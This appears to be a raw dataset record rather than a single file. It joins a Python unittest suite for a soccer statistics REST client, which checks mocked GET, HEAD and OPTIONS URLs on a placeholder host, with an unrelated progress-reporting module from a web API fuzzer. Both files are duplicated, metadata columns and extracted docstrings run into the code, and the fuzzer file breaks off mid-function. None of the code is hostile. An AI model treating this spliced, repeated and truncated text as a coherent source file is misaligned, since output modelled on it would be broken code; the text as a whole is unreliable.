def test_natl_match_endpoints_canonical_get(self, mock_resp, resp_obj, mock_dict):
"""Verify national team match resource endpoints with ID passed to GET."""
mock_resp.get.return_value.status_code = 200
match = "420aa27ce815499c85ec0301aff61ec4"
uid = "807f2a61bcea4a1bb98d66fface88b44"
value = self.client.natl.information.get(match)
mock_resp.get.assert_called_with(
'https://foo.uri/v1/national/matches/420aa27ce815499c85ec0301aff61ec4/info',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.natl.conditions.get(match)
mock_resp.get.assert_called_with(
'https://foo.uri/v1/national/matches/420aa27ce815499c85ec0301aff61ec4/conditions',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.natl.lineups.get(match, uid)
mock_resp.get.assert_called_with(
'https://foo.uri/v1/national/matches/420aa27ce815499c85ec0301aff61ec4/lineups/807f2a61bcea4a1bb98d66fface88b44',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.natl.goals.get(match, uid)
mock_resp.get.assert_called_with(
'https://foo.uri/v1/national/matches/420aa27ce815499c85ec0301aff61ec4/goals/807f2a61bcea4a1bb98d66fface88b44',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.natl.penalties.get(match, uid)
mock_resp.get.assert_called_with(
'https://foo.uri/v1/national/matches/420aa27ce815499c85ec0301aff61ec4/penalties/807f2a61bcea4a1bb98d66fface88b44',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.natl.offenses.get(match, uid)
mock_resp.get.assert_called_with(
'https://foo.uri/v1/national/matches/420aa27ce815499c85ec0301aff61ec4/offenses/807f2a61bcea4a1bb98d66fface88b44',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.natl.substitutions.get(match, uid)
mock_resp.get.assert_called_with(
'https://foo.uri/v1/national/matches/420aa27ce815499c85ec0301aff61ec4/substitutions/807f2a61bcea4a1bb98d66fface88b44',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.natl.shootouts.get(match, uid)
mock_resp.get.assert_called_with(
'https://foo.uri/v1/national/matches/420aa27ce815499c85ec0301aff61ec4/shootouts/807f2a61bcea4a1bb98d66fface88b44',
params={'app_id': 'ID', 'app_key': 'KEY'})
def test_club_events_endpoints_canonical_get(self, mock_resp, resp_obj, mock_dict):
"""Verify club match micro-event resource endpoints with ID passed to GET."""
mock_resp.get.return_value.status_code = 200
uid = "807f2a61bcea4a1bb98d66fface88b44"
value = self.client.club.events.all.get(uid)
mock_resp.get.assert_called_with(
'https://foo.uri/v1/clubs/events/all/807f2a61bcea4a1bb98d66fface88b44',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.club.events.touches.get(uid)
mock_resp.get.assert_called_with(
'https://foo.uri/v1/clubs/events/touches/807f2a61bcea4a1bb98d66fface88b44',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.club.events.actions.get(uid)
mock_resp.get.assert_called_with(
'https://foo.uri/v1/clubs/events/actions/807f2a61bcea4a1bb98d66fface88b44',
params={'app_id': 'ID', 'app_key': 'KEY'})
def test_natl_events_endpoints_canonical_get(self, mock_resp, resp_obj, mock_dict):
"""Verify national team match micro-event resource endpoints with ID passed to GET."""
mock_resp.get.return_value.status_code = 200
uid = "807f2a61bcea4a1bb98d66fface88b44"
value = self.client.natl.events.all.get(uid)
mock_resp.get.assert_called_with(
'https://foo.uri/v1/national/events/all/807f2a61bcea4a1bb98d66fface88b44',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.natl.events.touches.get(uid)
mock_resp.get.assert_called_with(
'https://foo.uri/v1/national/events/touches/807f2a61bcea4a1bb98d66fface88b44',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.natl.events.actions.get(uid)
mock_resp.get.assert_called_with(
'https://foo.uri/v1/national/events/actions/807f2a61bcea4a1bb98d66fface88b44',
params={'app_id': 'ID', 'app_key': 'KEY'})
def test_club_stats_endpoints_canonical_get(self, mock_resp, resp_obj, mock_dict):
"""Verify club match statistical resource endpoints with ID passed to GET."""
mock_resp.get.return_value.status_code = 200
uid = "807f2a61bcea4a1bb98d66fface88b44"
value = self.client.club.stats.crosses.corners.get(uid)
mock_resp.get.assert_called_with(
'https://foo.uri/v1/clubs/stats/crosses/corners/807f2a61bcea4a1bb98d66fface88b44',
params={'app_id': 'ID', 'app_key': 'KEY'})
def test_natl_stats_endpoints_canonical_get(self, mock_resp, resp_obj, mock_dict):
"""Verify national team match statistical resource endpoints with ID passed to GET."""
mock_resp.get.return_value.status_code = 200
uid = "807f2a61bcea4a1bb98d66fface88b44"
value = self.client.natl.stats.crosses.corners.get(uid)
mock_resp.get.assert_called_with(
'https://foo.uri/v1/national/stats/crosses/corners/807f2a61bcea4a1bb98d66fface88b44',
params={'app_id': 'ID', 'app_key': 'KEY'})
def test_analytics_endpoints_canonical_get(self, mock_resp, resp_obj, mock_dict):
"""Verify match analytics resource endpoints with ID passed to GET."""
mock_resp.get.return_value.status_code = 200
match = "420aa27ce815499c85ec0301aff61ec4"
value = self.client.analytics.state.get(match)
mock_resp.get.assert_called_with(
'https://foo.uri/v1/analytics/match/420aa27ce815499c85ec0301aff61ec4/state',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.analytics.segment.get(match)
mock_resp.get.assert_called_with(
'https://foo.uri/v1/analytics/match/420aa27ce815499c85ec0301aff61ec4/segment',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.analytics.tsr.get(match)
mock_resp.get.assert_called_with(
'https://foo.uri/v1/analytics/match/420aa27ce815499c85ec0301aff61ec4/tsr',
params={'app_id': 'ID', 'app_key': 'KEY'})
def test_validation_endpoints_head(self, mock_resp, resp_obj, mock_dict):
"""Verify URI of Validation resource HEAD request."""
mock_resp.head.return_value.status_code = 200
value = self.client.validation.phases.head()
mock_resp.head.assert_called_with('https://foo.uri/v1/phases',
params={'app_id': 'ID', 'app_key': 'KEY'})
mock_resp.reset_mock()
self.assertRaises(TypeError, self.client.validation.phases.head, 5)
def test_validation_endpoints_options(self, mock_resp, resp_obj, mock_dict):
"""Verify URI of Validation resource OPTIONS request."""
mock_resp.options.return_value.status_code = 200
value = self.client.validation.phases.options()
mock_resp.options.assert_called_with('https://foo.uri/v1/phases',
params={'app_id': 'ID', 'app_key': 'KEY'})
mock_resp.reset_mock()
self.assertRaises(TypeError, self.client.validation.phases.head, 5)
def test_personnel_endpoints_head(self, mock_resp, resp_obj, mock_dict):
"""Verify URI of Personnel resource HEAD request."""
mock_resp.head.return_value.status_code = 200
value = self.client.players.head()
mock_resp.head.assert_called_with('https://foo.uri/v1/personnel/players',
params={'app_id': 'ID', 'app_key': 'KEY'})
mock_resp.reset_mock()
self.assertRaises(TypeError, self.client.players.head, "807f2a61bcea4a1bb98d66fface88b44")
def test_personnel_endpoints_options(self, mock_resp, resp_obj, mock_dict):
"""Verify URI of Personnel resource OPTIONS request."""
mock_resp.options.return_value.status_code = 200
value = self.client.managers.options()
mock_resp.options.assert_called_with('https://foo.uri/v1/personnel/managers',
params={'app_id': 'ID', 'app_key': 'KEY'})
mock_resp.reset_mock()
self.assertRaises(TypeError, self.client.managers.head, "807f2a61bcea4a1bb98d66fface88b44")
def test_match_endpoints_head(self, mock_resp, resp_obj, mock_dict):
"""Verify URI of Match resource HEAD request."""
mock_resp.head.return_value.status_code = 200
value = self.client.club.information.head()
mock_resp.head.assert_called_with('https://foo.uri/v1/clubs/matches/info',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.natl.information.head()
mock_resp.head.assert_called_with('https://foo.uri/v1/national/matches/info',
params={'app_id': 'ID', 'app_key': 'KEY'})
mock_resp.reset_mock()
self.assertRaises(TypeError, self.client.club.information.head, "807f2a61bcea4a1bb98d66fface88b44")
self.assertRaises(TypeError, self.client.natl.information.head, "807f2a61bcea4a1bb98d66fface88b44")
def test_match_endpoints_options(self, mock_resp, resp_obj, mock_dict):
"""Verify URI of Match resource OPTIONS request."""
mock_resp.options.return_value.status_code = 200
value = self.client.club.goals.options()
mock_resp.options.assert_called_with('https://foo.uri/v1/clubs/matches/goals',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.natl.goals.options()
mock_resp.options.assert_called_with('https://foo.uri/v1/national/matches/goals',
params={'app_id': 'ID', 'app_key': 'KEY'})
mock_resp.reset_mock()
self.assertRaises(TypeError, self.client.club.goals.options, "807f2a61bcea4a1bb98d66fface88b44")
self.assertRaises(TypeError, self.client.natl.goals.options, "807f2a61bcea4a1bb98d66fface88b44")
def test_analytics_endpoints_head(self, mock_resp, resp_obj, mock_dict):
"""Verify URI of Match Analytics resource HEAD request."""
mock_resp.head.return_value.status_code = 200
value = self.client.analytics.state.head()
mock_resp.head.assert_called_with('https://foo.uri/v1/analytics/match/state',
params={'app_id': 'ID', 'app_key': 'KEY'})
mock_resp.reset_mock()
self.assertRaises(TypeError, self.client.analytics.state.head, "807f2a61bcea4a1bb98d66fface88b44")
def test_analytics_endpoints_options(self, mock_resp, resp_obj, mock_dict):
"""Verify URI of Match Analytics resource OPTIONS request."""
mock_resp.options.return_value.status_code = 200
value = self.client.analytics.segment.options()
mock_resp.options.assert_called_with('https://foo.uri/v1/analytics/match/segment',
params={'app_id': 'ID', 'app_key': 'KEY'})
mock_resp.reset_mock()
self.assertRaises(TypeError, self.client.analytics.segment.options, "807f2a61bcea4a1bb98d66fface88b44")
| import unittest
import mock
from soccermetrics.rest import SoccermetricsRestClient
@mock.patch('soccermetrics.rest.resources.base.EasyDict')
@mock.patch('soccermetrics.rest.resources.base.Response')
@mock.patch('soccermetrics.rest.resources.base.requests')
class ClientCanonicalEndpointTest(unittest.TestCase):
"""
Test canonical endpoints of API resources in client.
"""
def setUp(self):
self.client = SoccermetricsRestClient(base_uri="https://foo.uri", account="ID", api_key="KEY")
def create_patch(self, name):
patcher = mock.patch(name)
thing = patcher.start()
self.addCleanup(patcher.stop)
return thing
def test_validation_endpoints_integer_id_get(self, mock_resp, resp_obj, mock_dict):
"""Verify URI of Validation resources with integer UIDs passed to GET."""
mock_resp.get.return_value.status_code = 200
value = self.client.validation.phases.get(2)
mock_resp.get.assert_called_with('https://foo.uri/v1/phases/2',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.validation.groupRounds.get(20)
mock_resp.get.assert_called_with('https://foo.uri/v1/grouprounds/20',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.validation.knockoutRounds.get(20)
mock_resp.get.assert_called_with('https://foo.uri/v1/knockoutrounds/20',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.validation.confederations.get(10)
mock_resp.get.assert_called_with('https://foo.uri/v1/confederations/10',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.validation.seasons.get(200)
mock_resp.get.assert_called_with('https://foo.uri/v1/seasons/200',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.validation.timezones.get(20)
mock_resp.get.assert_called_with('https://foo.uri/v1/timezones/20',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.validation.nameOrder.get(2)
mock_resp.get.assert_called_with('https://foo.uri/v1/name_order/2',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.validation.positions.get(20)
mock_resp.get.assert_called_with('https://foo.uri/v1/positions/20',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.validation.fouls.get(20)
mock_resp.get.assert_called_with('https://foo.uri/v1/fouls/20',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.validation.cards.get(2)
mock_resp.get.assert_called_with('https://foo.uri/v1/cards/2',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.validation.bodyparts.get(2)
mock_resp.get.assert_called_with('https://foo.uri/v1/bodyparts/2',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.validation.shotevents.get(20)
mock_resp.get.assert_called_with('https://foo.uri/v1/shotevents/20',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.validation.penaltyOutcomes.get(2)
mock_resp.get.assert_called_with('https://foo.uri/v1/penalty_outcomes/2',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.validation.actions.get(200)
mock_resp.get.assert_called_with('https://foo.uri/v1/actions/200',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.validation.modifiers.get(200)
mock_resp.get.assert_called_with('https://foo.uri/v1/modifiers/200',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.validation.modifierCategories.get(20)
mock_resp.get.assert_called_with('https://foo.uri/v1/modifier_categories/20',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.validation.weather.get(20)
mock_resp.get.assert_called_with('https://foo.uri/v1/weather/20',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.validation.surfaces.get(20)
mock_resp.get.assert_called_with('https://foo.uri/v1/surfaces/20',
params={'app_id': 'ID', 'app_key': 'KEY'})
def test_validation_endpoints_uuid_get(self, mock_resp, resp_obj, mock_dict):
"""Verify URI of Validation resources with UUIDs passed to GET."""
mock_resp.get.return_value.status_code = 200
uid = "420aa27ce815499c85ec0301aff61ec4"
value = self.client.validation.countries.get(uid)
mock_resp.get.assert_called_with(
'https://foo.uri/v1/countries/420aa27ce815499c85ec0301aff61ec4',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.validation.competitions.get(uid)
mock_resp.get.assert_called_with(
'https://foo.uri/v1/competitions/420aa27ce815499c85ec0301aff61ec4',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.validation.domesticCompetitions.get(uid)
mock_resp.get.assert_called_with(
'https://foo.uri/v1/domestic_competitions/420aa27ce815499c85ec0301aff61ec4',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.validation.intlCompetitions.get(uid)
mock_resp.get.assert_called_with(
'https://foo.uri/v1/intl_competitions/420aa27ce815499c85ec0301aff61ec4',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.validation.teams.get(uid)
mock_resp.get.assert_called_with(
'https://foo.uri/v1/teams/420aa27ce815499c85ec0301aff61ec4',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.validation.venues.get(uid)
mock_resp.get.assert_called_with(
'https://foo.uri/v1/venues/420aa27ce815499c85ec0301aff61ec4',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.validation.persons.get(uid)
mock_resp.get.assert_called_with(
'https://foo.uri/v1/persons/420aa27ce815499c85ec0301aff61ec4',
params={'app_id': 'ID', 'app_key': 'KEY'})
def test_personnel_endpoints_canonical_get(self, mock_resp, resp_obj, mock_dict):
"""Verify personnel resource endpoints with ID passed to GET."""
mock_resp.get.return_value.status_code = 200
uid = "807f2a61bcea4a1bb98d66fface88b44"
value = self.client.players.get(uid)
mock_resp.get.assert_called_with(
'https://foo.uri/v1/personnel/players/807f2a61bcea4a1bb98d66fface88b44',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.managers.get(uid)
mock_resp.get.assert_called_with(
'https://foo.uri/v1/personnel/managers/807f2a61bcea4a1bb98d66fface88b44',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.referees.get(uid)
mock_resp.get.assert_called_with(
'https://foo.uri/v1/personnel/referees/807f2a61bcea4a1bb98d66fface88b44',
params={'app_id': 'ID', 'app_key': 'KEY'})
def test_club_match_endpoints_canonical_get(self, mock_resp, resp_obj, mock_dict):
"""Verify club match resource endpoints with ID passed to GET."""
mock_resp.get.return_value.status_code = 200
match = "420aa27ce815499c85ec0301aff61ec4"
uid = "807f2a61bcea4a1bb98d66fface88b44"
value = self.client.club.information.get(match)
mock_resp.get.assert_called_with(
'https://foo.uri/v1/clubs/matches/420aa27ce815499c85ec0301aff61ec4/info',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.club.conditions.get(match)
mock_resp.get.assert_called_with(
'https://foo.uri/v1/clubs/matches/420aa27ce815499c85ec0301aff61ec4/conditions',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.club.lineups.get(match, uid)
mock_resp.get.assert_called_with(
'https://foo.uri/v1/clubs/matches/420aa27ce815499c85ec0301aff61ec4/lineups/807f2a61bcea4a1bb98d66fface88b44',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.club.goals.get(match, uid)
mock_resp.get.assert_called_with(
'https://foo.uri/v1/clubs/matches/420aa27ce815499c85ec0301aff61ec4/goals/807f2a61bcea4a1bb98d66fface88b44',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.club.penalties.get(match, uid)
mock_resp.get.assert_called_with(
'https://foo.uri/v1/clubs/matches/420aa27ce815499c85ec0301aff61ec4/penalties/807f2a61bcea4a1bb98d66fface88b44',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.club.offenses.get(match, uid)
mock_resp.get.assert_called_with(
'https://foo.uri/v1/clubs/matches/420aa27ce815499c85ec0301aff61ec4/offenses/807f2a61bcea4a1bb98d66fface88b44',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.club.substitutions.get(match, uid)
mock_resp.get.assert_called_with(
'https://foo.uri/v1/clubs/matches/420aa27ce815499c85ec0301aff61ec4/substitutions/807f2a61bcea4a1bb98d66fface88b44',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.club.shootouts.get(match, uid)
mock_resp.get.assert_called_with(
'https://foo.uri/v1/clubs/matches/420aa27ce815499c85ec0301aff61ec4/shootouts/807f2a61bcea4a1bb98d66fface88b44',
params={'app_id': 'ID', 'app_key': 'KEY'})
def test_natl_match_endpoints_canonical_get(self, mock_resp, resp_obj, mock_dict):
"""Verify national team match resource endpoints with ID passed to GET."""
mock_resp.get.return_value.status_code = 200
match = "420aa27ce815499c85ec0301aff61ec4"
uid = "807f2a61bcea4a1bb98d66fface88b44"
value = self.client.natl.information.get(match)
mock_resp.get.assert_called_with(
'https://foo.uri/v1/national/matches/420aa27ce815499c85ec0301aff61ec4/info',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.natl.conditions.get(match)
mock_resp.get.assert_called_with(
'https://foo.uri/v1/national/matches/420aa27ce815499c85ec0301aff61ec4/conditions',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.natl.lineups.get(match, uid)
mock_resp.get.assert_called_with(
'https://foo.uri/v1/national/matches/420aa27ce815499c85ec0301aff61ec4/lineups/807f2a61bcea4a1bb98d66fface88b44',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.natl.goals.get(match, uid)
mock_resp.get.assert_called_with(
'https://foo.uri/v1/national/matches/420aa27ce815499c85ec0301aff61ec4/goals/807f2a61bcea4a1bb98d66fface88b44',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.natl.penalties.get(match, uid)
mock_resp.get.assert_called_with(
'https://foo.uri/v1/national/matches/420aa27ce815499c85ec0301aff61ec4/penalties/807f2a61bcea4a1bb98d66fface88b44',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.natl.offenses.get(match, uid)
mock_resp.get.assert_called_with(
'https://foo.uri/v1/national/matches/420aa27ce815499c85ec0301aff61ec4/offenses/807f2a61bcea4a1bb98d66fface88b44',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.natl.substitutions.get(match, uid)
mock_resp.get.assert_called_with(
'https://foo.uri/v1/national/matches/420aa27ce815499c85ec0301aff61ec4/substitutions/807f2a61bcea4a1bb98d66fface88b44',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.natl.shootouts.get(match, uid)
mock_resp.get.assert_called_with(
'https://foo.uri/v1/national/matches/420aa27ce815499c85ec0301aff61ec4/shootouts/807f2a61bcea4a1bb98d66fface88b44',
params={'app_id': 'ID', 'app_key': 'KEY'})
def test_club_events_endpoints_canonical_get(self, mock_resp, resp_obj, mock_dict):
"""Verify club match micro-event resource endpoints with ID passed to GET."""
mock_resp.get.return_value.status_code = 200
uid = "807f2a61bcea4a1bb98d66fface88b44"
value = self.client.club.events.all.get(uid)
mock_resp.get.assert_called_with(
'https://foo.uri/v1/clubs/events/all/807f2a61bcea4a1bb98d66fface88b44',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.club.events.touches.get(uid)
mock_resp.get.assert_called_with(
'https://foo.uri/v1/clubs/events/touches/807f2a61bcea4a1bb98d66fface88b44',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.club.events.actions.get(uid)
mock_resp.get.assert_called_with(
'https://foo.uri/v1/clubs/events/actions/807f2a61bcea4a1bb98d66fface88b44',
params={'app_id': 'ID', 'app_key': 'KEY'})
def test_natl_events_endpoints_canonical_get(self, mock_resp, resp_obj, mock_dict):
"""Verify national team match micro-event resource endpoints with ID passed to GET."""
mock_resp.get.return_value.status_code = 200
uid = "807f2a61bcea4a1bb98d66fface88b44"
value = self.client.natl.events.all.get(uid)
mock_resp.get.assert_called_with(
'https://foo.uri/v1/national/events/all/807f2a61bcea4a1bb98d66fface88b44',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.natl.events.touches.get(uid)
mock_resp.get.assert_called_with(
'https://foo.uri/v1/national/events/touches/807f2a61bcea4a1bb98d66fface88b44',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.natl.events.actions.get(uid)
mock_resp.get.assert_called_with(
'https://foo.uri/v1/national/events/actions/807f2a61bcea4a1bb98d66fface88b44',
params={'app_id': 'ID', 'app_key': 'KEY'})
def test_club_stats_endpoints_canonical_get(self, mock_resp, resp_obj, mock_dict):
"""Verify club match statistical resource endpoints with ID passed to GET."""
mock_resp.get.return_value.status_code = 200
uid = "807f2a61bcea4a1bb98d66fface88b44"
value = self.client.club.stats.crosses.corners.get(uid)
mock_resp.get.assert_called_with(
'https://foo.uri/v1/clubs/stats/crosses/corners/807f2a61bcea4a1bb98d66fface88b44',
params={'app_id': 'ID', 'app_key': 'KEY'})
def test_natl_stats_endpoints_canonical_get(self, mock_resp, resp_obj, mock_dict):
"""Verify national team match statistical resource endpoints with ID passed to GET."""
mock_resp.get.return_value.status_code = 200
uid = "807f2a61bcea4a1bb98d66fface88b44"
value = self.client.natl.stats.crosses.corners.get(uid)
mock_resp.get.assert_called_with(
'https://foo.uri/v1/national/stats/crosses/corners/807f2a61bcea4a1bb98d66fface88b44',
params={'app_id': 'ID', 'app_key': 'KEY'})
def test_analytics_endpoints_canonical_get(self, mock_resp, resp_obj, mock_dict):
"""Verify match analytics resource endpoints with ID passed to GET."""
mock_resp.get.return_value.status_code = 200
match = "420aa27ce815499c85ec0301aff61ec4"
value = self.client.analytics.state.get(match)
mock_resp.get.assert_called_with(
'https://foo.uri/v1/analytics/match/420aa27ce815499c85ec0301aff61ec4/state',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.analytics.segment.get(match)
mock_resp.get.assert_called_with(
'https://foo.uri/v1/analytics/match/420aa27ce815499c85ec0301aff61ec4/segment',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.analytics.tsr.get(match)
mock_resp.get.assert_called_with(
'https://foo.uri/v1/analytics/match/420aa27ce815499c85ec0301aff61ec4/tsr',
params={'app_id': 'ID', 'app_key': 'KEY'})
def test_validation_endpoints_head(self, mock_resp, resp_obj, mock_dict):
"""Verify URI of Validation resource HEAD request."""
mock_resp.head.return_value.status_code = 200
value = self.client.validation.phases.head()
mock_resp.head.assert_called_with('https://foo.uri/v1/phases',
params={'app_id': 'ID', 'app_key': 'KEY'})
mock_resp.reset_mock()
self.assertRaises(TypeError, self.client.validation.phases.head, 5)
def test_validation_endpoints_options(self, mock_resp, resp_obj, mock_dict):
"""Verify URI of Validation resource OPTIONS request."""
mock_resp.options.return_value.status_code = 200
value = self.client.validation.phases.options()
mock_resp.options.assert_called_with('https://foo.uri/v1/phases',
params={'app_id': 'ID', 'app_key': 'KEY'})
mock_resp.reset_mock()
self.assertRaises(TypeError, self.client.validation.phases.head, 5)
def test_personnel_endpoints_head(self, mock_resp, resp_obj, mock_dict):
"""Verify URI of Personnel resource HEAD request."""
mock_resp.head.return_value.status_code = 200
value = self.client.players.head()
mock_resp.head.assert_called_with('https://foo.uri/v1/personnel/players',
params={'app_id': 'ID', 'app_key': 'KEY'})
mock_resp.reset_mock()
self.assertRaises(TypeError, self.client.players.head, "807f2a61bcea4a1bb98d66fface88b44")
def test_personnel_endpoints_options(self, mock_resp, resp_obj, mock_dict):
"""Verify URI of Personnel resource OPTIONS request."""
mock_resp.options.return_value.status_code = 200
value = self.client.managers.options()
mock_resp.options.assert_called_with('https://foo.uri/v1/personnel/managers',
params={'app_id': 'ID', 'app_key': 'KEY'})
mock_resp.reset_mock()
self.assertRaises(TypeError, self.client.managers.head, "807f2a61bcea4a1bb98d66fface88b44")
def test_match_endpoints_head(self, mock_resp, resp_obj, mock_dict):
"""Verify URI of Match resource HEAD request."""
mock_resp.head.return_value.status_code = 200
value = self.client.club.information.head()
mock_resp.head.assert_called_with('https://foo.uri/v1/clubs/matches/info',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.natl.information.head()
mock_resp.head.assert_called_with('https://foo.uri/v1/national/matches/info',
params={'app_id': 'ID', 'app_key': 'KEY'})
mock_resp.reset_mock()
self.assertRaises(TypeError, self.client.club.information.head, "807f2a61bcea4a1bb98d66fface88b44")
self.assertRaises(TypeError, self.client.natl.information.head, "807f2a61bcea4a1bb98d66fface88b44")
def test_match_endpoints_options(self, mock_resp, resp_obj, mock_dict):
"""Verify URI of Match resource OPTIONS request."""
mock_resp.options.return_value.status_code = 200
value = self.client.club.goals.options()
mock_resp.options.assert_called_with('https://foo.uri/v1/clubs/matches/goals',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.natl.goals.options()
mock_resp.options.assert_called_with('https://foo.uri/v1/national/matches/goals',
params={'app_id': 'ID', 'app_key': 'KEY'})
mock_resp.reset_mock()
self.assertRaises(TypeError, self.client.club.goals.options, "807f2a61bcea4a1bb98d66fface88b44")
self.assertRaises(TypeError, self.client.natl.goals.options, "807f2a61bcea4a1bb98d66fface88b44")
def test_analytics_endpoints_head(self, mock_resp, resp_obj, mock_dict):
"""Verify URI of Match Analytics resource HEAD request."""
mock_resp.head.return_value.status_code = 200
value = self.client.analytics.state.head()
mock_resp.head.assert_called_with('https://foo.uri/v1/analytics/match/state',
params={'app_id': 'ID', 'app_key': 'KEY'})
mock_resp.reset_mock()
self.assertRaises(TypeError, self.client.analytics.state.head, "807f2a61bcea4a1bb98d66fface88b44")
def test_analytics_endpoints_options(self, mock_resp, resp_obj, mock_dict):
"""Verify URI of Match Analytics resource OPTIONS request."""
mock_resp.options.return_value.status_code = 200
value = self.client.analytics.segment.options()
mock_resp.options.assert_called_with('https://foo.uri/v1/analytics/match/segment',
params={'app_id': 'ID', 'app_key': 'KEY'})
mock_resp.reset_mock()
self.assertRaises(TypeError, self.client.analytics.segment.options, "807f2a61bcea4a1bb98d66fface88b44")
| en | 0.67387 | Test canonical endpoints of API resources in client. Verify URI of Validation resources with integer UIDs passed to GET. Verify URI of Validation resources with UUIDs passed to GET. Verify personnel resource endpoints with ID passed to GET. Verify club match resource endpoints with ID passed to GET. Verify national team match resource endpoints with ID passed to GET. Verify club match micro-event resource endpoints with ID passed to GET. Verify national team match micro-event resource endpoints with ID passed to GET. Verify club match statistical resource endpoints with ID passed to GET. Verify national team match statistical resource endpoints with ID passed to GET. Verify match analytics resource endpoints with ID passed to GET. Verify URI of Validation resource HEAD request. Verify URI of Validation resource OPTIONS request. Verify URI of Personnel resource HEAD request. Verify URI of Personnel resource OPTIONS request. Verify URI of Match resource HEAD request. Verify URI of Match resource OPTIONS request. Verify URI of Match Analytics resource HEAD request. Verify URI of Match Analytics resource OPTIONS request. | 2.739438 | 3 |
fuzzer/progress_reporter.py | ysoftdevs/wapifuzz | 3 | 6623866 | <filename>fuzzer/progress_reporter.py<gh_stars>1-10
import os
import threading
import sys
import datetime
from configuration_manager import ConfigurationManager
DID_FUZZING_STARTED_CHECKS_TIME_INTERVAL_IN_SECONDS = 5
def report_progress(session, junit_logger):
if did_fuzzing_already_started(session) > 0:
if is_fuzzing_hanged(session):
message = create_hanged_message(session)
print(message, file=sys.stderr)
try:
junit_logger.close_test()
except:
pass
finally:
os._exit(2)
if is_fuzzing_still_in_progress(session):
plan_another_report(session, junit_logger, ConfigurationManager.get_reporting_interval())
message = create_report_message(session)
print(message)
else:
plan_another_report(session, junit_logger, DID_FUZZING_STARTED_CHECKS_TIME_INTERVAL_IN_SECONDS)
def plan_another_report(session, junit_logger, reporting_interval):
threading.Timer(reporting_interval, report_progress, [session, junit_logger]).start()
def did_fuzzing_already_started(session):
return session.total_num_mutations > 0
def is_fuzzing_hanged(session):
hanged = is_fuzzing_hanged.previous_mutant_index == session.total_mutant_index
is_fuzzing_hanged.previous_mutant_index = session.total_mutant_index
return hanged
is_fuzzing_hanged.previous_mutant_index = -1
def is_fuzzing_still_in_progress(session):
return session.total_num_mutations != session.total_mutant_index
def create_report_message(session):
percentage = session.total_mutant_index / session.total_num_mutations * 100
percentage = str(round(percentage, 2))
message = str(datetime.datetime.now()) + ": "
message += "Proceeded " + str(session.total_mutant_index) + " of "
message += str(session.total_num_mutations) + " (" + percentage + "%) test cases"
return message
def create_hanged_message(session):
test_case_number = str(session.total_mutant_index)
return "Fuzzing hangs on test case number: " + test_case_number + ". See log file for an error message."
| <filename>fuzzer/progress_reporter.py<gh_stars>1-10
import os
import threading
import sys
import datetime
from configuration_manager import ConfigurationManager
DID_FUZZING_STARTED_CHECKS_TIME_INTERVAL_IN_SECONDS = 5
def report_progress(session, junit_logger):
if did_fuzzing_already_started(session) > 0:
if is_fuzzing_hanged(session):
message = create_hanged_message(session)
print(message, file=sys.stderr)
try:
junit_logger.close_test()
except:
pass
finally:
